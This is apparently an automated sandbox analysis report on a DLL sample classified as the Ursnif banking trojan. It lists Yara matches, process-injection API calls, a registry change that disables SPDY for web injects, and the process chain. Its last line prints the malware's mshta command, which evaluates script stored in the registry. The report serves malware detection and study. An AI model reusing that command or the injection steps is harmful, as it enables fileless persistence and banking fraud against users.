                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_036D5FBB

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D4BF12_2_036D4BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D16452_2_036D1645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D829C2_2_036D829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628FF4D2_2_0628FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628D7F12_2_0628D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062767CA2_2_062767CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628154D2_2_0628154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06293DB02_2_06293DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627B2382_2_0627B238
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052B4B824_2_0052B4B8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052966024_2_00529660
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052EEF824_2_0052EEF8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054785024_2_00547850
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053186424_2_00531864
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053283024_2_00532830
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005498A824_2_005498A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005480A824_2_005480A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052716C24_2_0052716C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052511024_2_00525110
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052410C24_2_0052410C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053E12024_2_0053E120
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053B9E024_2_0053B9E0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005451A824_2_005451A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053424024_2_00534240
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053124824_2_00531248
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054C22024_2_0054C220
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00542AD824_2_00542AD8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00548AC024_2_00548AC0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005473EC24_2_005473EC
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054AC5024_2_0054AC50
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053C46C24_2_0053C46C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052D40424_2_0052D404
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00523C3C24_2_00523C3C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054242824_2_00542428
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054D4D424_2_0054D4D4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005234D824_2_005234D8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005434C024_2_005434C0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00536CA424_2_00536CA4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00529D1C24_2_00529D1C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053CD1C24_2_0053CD1C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054053024_2_00540530
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00547DB424_2_00547DB4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00541E5C24_2_00541E5C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053867024_2_00538670
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054163824_2_00541638
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053BED024_2_0053BED0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00532EE824_2_00532EE8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054568424_2_00545684
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00521EA824_2_00521EA8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00534F5C24_2_00534F5C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00536F7824_2_00536F78
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054772C24_2_0054772C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052572C24_2_0052572C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393EEF837_2_000001572393EEF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393B4B837_2_000001572393B4B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395C22037_2_000001572395C220
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394124837_2_0000015723941248
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394424037_2_0000015723944240
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239551A837_2_00000157239551A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394B9E037_2_000001572394B9E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393410C37_2_000001572393410C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393511037_2_0000015723935110
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394E12037_2_000001572394E120
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239598A837_2_00000157239598A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239580A837_2_00000157239580A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394283037_2_0000015723942830
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395785037_2_0000015723957850
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394186437_2_0000015723941864
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723946F7837_2_0000015723946F78
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395772C37_2_000001572395772C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393572C37_2_000001572393572C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723944F5C37_2_0000015723944F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395568437_2_0000015723955684
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723931EA837_2_0000015723931EA8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394BED037_2_000001572394BED0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723942EE837_2_0000015723942EE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395163837_2_0000015723951638
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394867037_2_0000015723948670
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723951E5C37_2_0000015723951E5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393966037_2_0000015723939660
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723957DB437_2_0000015723957DB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395053037_2_0000015723950530
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394CD1C37_2_000001572394CD1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723939D1C37_2_0000015723939D1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723946CA437_2_0000015723946CA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395D4D437_2_000001572395D4D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239534C037_2_00000157239534C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239334D837_2_00000157239334D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393D40437_2_000001572393D404
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395242837_2_0000015723952428
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395AC5037_2_000001572395AC50
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723933C3C37_2_0000015723933C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394C46C37_2_000001572394C46C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239573EC37_2_00000157239573EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723958AC037_2_0000015723958AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723952AD837_2_0000015723952AD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06288E57 CreateProcessAsUserW,2_2_06288E57
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 2oCOO5LbPu.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2oCOO5LbPu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_036D4321
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D190C GetProcAddress,NtCreateSection,memset,2_2_036D190C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D6D0A NtMapViewOfSection,2_2_036D6D0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D84C1 NtQueryVirtualMemory,2_2_036D84C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BE80 NtMapViewOfSection,2_2_0628BE80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_06280782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_0627C431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062774AE NtQueryInformationProcess,2_2_062774AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_06286DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_06282331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_06285312
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_0628A806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_062800DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627710A GetProcAddress,NtCreateSection,memset,2_2_0627710A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_06287950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_062861AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError,2_2_062736BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_0627D77A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_0627B7D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062764C4 memset,NtQueryInformationProcess,2_2_062764C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_06285220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_0628EAC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_06283829
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_062710C7
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053583C NtCreateSection,24_2_0053583C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005240C0 NtReadVirtualMemory,24_2_005240C0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054A148 NtQueryInformationProcess,24_2_0054A148
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess,24_2_0052B11C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005341D8 NtMapViewOfSection,24_2_005341D8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,24_2_0052AA6C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005404CC NtAllocateVirtualMemory,24_2_005404CC
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00526D24 NtWriteVirtualMemory,24_2_00526D24
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,24_2_005265E4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose,24_2_00529660
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory,24_2_0055F002
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395A148 NtQueryInformationProcess,37_2_000001572395A148
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,37_2_00000157239365E4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_000001572396F002
                      Source: 2oCOO5LbPu.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 2oCOO5LbPu.dll
                      Source: 2oCOO5LbPu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: 2E09.bin.27.drBinary string: Boot Device: \Device\HarddiskVolume2
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: 2oCOO5LbPu.dllReversingLabs: Detection: 50%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
